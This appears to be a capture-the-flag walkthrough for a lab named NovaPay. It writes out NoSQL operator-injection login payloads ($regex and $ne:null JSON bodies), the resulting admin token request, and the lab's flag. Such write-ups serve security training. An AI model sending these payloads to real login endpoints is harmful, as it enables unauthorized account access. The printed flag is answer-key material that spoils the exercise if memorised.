HACKR.GG
hackr.gg — NovaPay — MongoDB Injection Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

NovaPay — MongoDB Injection

NoSQL Injection · NoSQL Injection — Operator Injection
Difficulty
Intermediate
Vuln class
NoSQL Injection — Operator Injection
Steps
3
// Objective
Bypass the NovaPay internal portal login using MongoDB operator injection.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Identify the injection point
The login form sends JSON. Test if MongoDB operators are accepted by injecting $regex to match any password.
Command / Input
POST /api/login {"username":"admin","password":{"$regex":".*"}}
Output
{"error":"Invalid credentials"}
If $regex returns an error vs. 401, the query parser is interpreting operators.
2
Use $ne for full bypass
Inject $ne to match any document where password is not an empty string.
Command / Input
POST /api/login {"username":"admin","password":{"$ne":null}}
Output
{"token":"eyJ...","user":"admin"}
3
Get the flag
Use the admin token to access the protected dashboard.
Command / Input
GET /api/admin/flag Authorization: Bearer TOKEN
Output
{"flag":"HackrGG{n0sql_0p3r4t0r_1nj3ct10n_byp4ss}"}
// Flag
Flag value
HackrGG{n0sql_0p3r4t0r_1nj3ct10n_byp4ss}
In the admin dashboard, accessible after $ne operator injection bypasses login.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute